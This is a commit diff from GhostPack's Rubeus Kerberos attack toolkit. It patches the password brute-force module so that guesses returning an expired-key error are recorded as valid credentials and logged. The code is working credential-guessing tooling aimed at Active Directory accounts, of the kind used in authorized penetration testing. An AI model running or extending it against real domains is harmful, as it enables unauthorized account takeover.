fixed issue #81 with brute command

GhostPack · Jun 22, 2021 · 3d14a56 · 3d14a56
1 parent 700ffff
commit 3d14a56
Show file tree

Hide file tree

Showing 2 changed files with 21 additions and 9 deletions.
diff --git a/Rubeus/Commands/Brute.cs b/Rubeus/Commands/Brute.cs
@@ -344,11 +344,18 @@ public BruteforceConsoleReporter(string passwordsOutfile, uint verbose = 0, bool
             this.saveTicket = saveTicket;
         }
 
-        public void ReportValidPassword(string domain, string username, string password, byte[] ticket)
+        public void ReportValidPassword(string domain, string username, string password, byte[] ticket, Interop.KERBEROS_ERROR err = Interop.KERBEROS_ERROR.KDC_ERR_NONE)
         {
-            Console.WriteLine("[+] STUPENDOUS => {0}:{1}", username, password);
             this.WriteUserPasswordToFile(username, password);
-            this.HandleTicket(username, ticket);
+            if (ticket != null)
+            {
+                Console.WriteLine("[+] STUPENDOUS => {0}:{1}", username, password);
+                this.HandleTicket(username, ticket);
+            }
+            else
+            {
+                Console.WriteLine("[+] UNLUCKY => {0}:{1} ({2})", username, password, err);
+            }
         }
 
         public void ReportValidUser(string domain, string username)

diff --git a/Rubeus/lib/Bruteforcer.cs b/Rubeus/lib/Bruteforcer.cs
@@ -6,7 +6,7 @@ namespace Rubeus
 
     public interface IBruteforcerReporter
     {
-        void ReportValidPassword(string domain, string username, string password, byte[] ticket);
+        void ReportValidPassword(string domain, string username, string password, byte[] ticket, Interop.KERBEROS_ERROR err = Interop.KERBEROS_ERROR.KDC_ERR_NONE);
         void ReportValidUser(string domain, string username);
         void ReportInvalidUser(string domain, string username);
         void ReportBlockedUser(string domain, string username);
@@ -63,7 +63,7 @@ private bool TestUsernamePassword(string username, string password)
             }
             catch (KerberosErrorException ex)
             {
-                this.HandleKerberosError(ex, username);
+                return this.HandleKerberosError(ex, username, password);
             }
 
             return false;
@@ -89,18 +89,18 @@ private void GetUsernamePasswordTGT(string username, string password)
             this.ReportValidPassword(username, password, TGT);
         }
 
-        private void HandleKerberosError(KerberosErrorException ex, string username)
+        private bool HandleKerberosError(KerberosErrorException ex, string username, string password)
         {
 
 
             KRB_ERROR krbError = ex.krbError;
+            bool ret = false;
 
             switch ((Interop.KERBEROS_ERROR)krbError.error_code)
             {
                 case Interop.KERBEROS_ERROR.KDC_ERR_PREAUTH_FAILED:
                     this.ReportValidUser(username);
                     break;
-
                 case Interop.KERBEROS_ERROR.KDC_ERR_C_PRINCIPAL_UNKNOWN:
                     this.ReportInvalidUser(username);
                     break;
@@ -110,21 +110,26 @@ private void HandleKerberosError(KerberosErrorException ex, string username)
                 case Interop.KERBEROS_ERROR.KDC_ERR_ETYPE_NOTSUPP:
                     this.ReportInvalidEncryptionType(username, krbError);
                     break;
+                case Interop.KERBEROS_ERROR.KDC_ERR_KEY_EXPIRED:
+                    this.ReportValidPassword(username, password, null, (Interop.KERBEROS_ERROR)krbError.error_code);
+                    ret = true;
+                    break;
                 default:
                     this.ReportKrbError(username, krbError);
                     throw ex;
             }
+            return ret;
         }
 
-        private void ReportValidPassword(string username, string password, byte[] ticket)
+        private void ReportValidPassword(string username, string password, byte[] ticket, Interop.KERBEROS_ERROR err = Interop.KERBEROS_ERROR.KDC_ERR_NONE)
         {
 
             validCredentials.Add(username, password);
             if (!validUsers.ContainsKey(username))
             {
                 validUsers.Add(username, true);
             }
-            this.reporter.ReportValidPassword(this.domain, username, password, ticket);
+            this.reporter.ReportValidPassword(this.domain, username, password, ticket, err);
         }
 
         private void ReportValidUser(string username)